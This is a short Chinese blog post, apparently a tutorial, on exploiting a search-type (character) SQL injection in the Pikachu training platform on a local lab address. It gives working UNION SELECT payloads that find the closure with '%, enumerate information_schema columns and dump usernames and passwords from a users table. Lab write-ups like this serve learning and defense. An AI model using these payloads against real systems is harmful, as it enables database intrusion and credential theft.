pikachu 漏洞平台sql注入 之 字符型注入
2021/6/26 20:01:27
本文主要是介绍pikachu 漏洞平台sql注入 之 字符型注入,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
http://192.168.66.4/pikachu/vul/sqli/sqli_search.php?name=&submit=%E6%90%9C%E7%B4%A2
随便搜一下得到URL
找找闭合 判断一下是否存在注入 加了 ’ 之后报出数据库错误 说明执行了 数据库查询语句
构造PAylodad 先查一下主查询字段数
1、找闭合
看下报错信息
这里有个百分号 加个百分号试一下 到4报错 看来 是有三个主查询字段
构造payload
union select database(),2,3%23
查库名 由于知道了 列数 payload必须跟列数对应 所以 database() 后面跟上了 2 ,3 %23 是# 表示注释掉数据库中的 ’ 下图中爆出数据库的名字为pikachu
下
接着构造我们的payload 我们知道了库的名字 我们需要接着看看库里面有哪些表
表中的敏感字段爆出来了 接着构造payload 查查 users
xi%’ union select group_concat(column_name),2,3 from information_schema.columns where table_name=‘users’#
接着构造payload
dasdas%’ union select username,password,level from users#
结束 总结 搜索型注入要注意闭合点得加% 因为数据库中用%占位去进行模糊搜索
这篇关于pikachu 漏洞平台sql注入 之 字符型注入的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-09-28pyqt 怎么打包整个项目-icode9专业技术文章分享
- 2024-09-28laravel Commands 创建带有参数的 Artisan 命令的步骤和示例-icode9专业技术文章分享
- 2024-09-28antd怎么实现渲染tiff图片-icode9专业技术文章分享
- 2024-09-28英文半角中划线和中文全角的中划线有什么区别-icode9专业技术文章分享
- 2024-09-28nvm npm 和node 他们之间有什么关系-icode9专业技术文章分享
- 2024-09-28Node Version Manager (nvm)使用教程-icode9专业技术文章分享
- 2024-09-28nvm命令太慢,是什么原因-icode9专业技术文章分享
- 2024-09-28Kotlin 如何增加、删除和修改 MutableStateFlow 中的值。-icode9专业技术文章分享
- 2024-09-28Kotlin的stateFlow.update 写法介绍-icode9专业技术文章分享
- 2024-09-28kotlin 怎么获取当前时间格式-icode9专业技术文章分享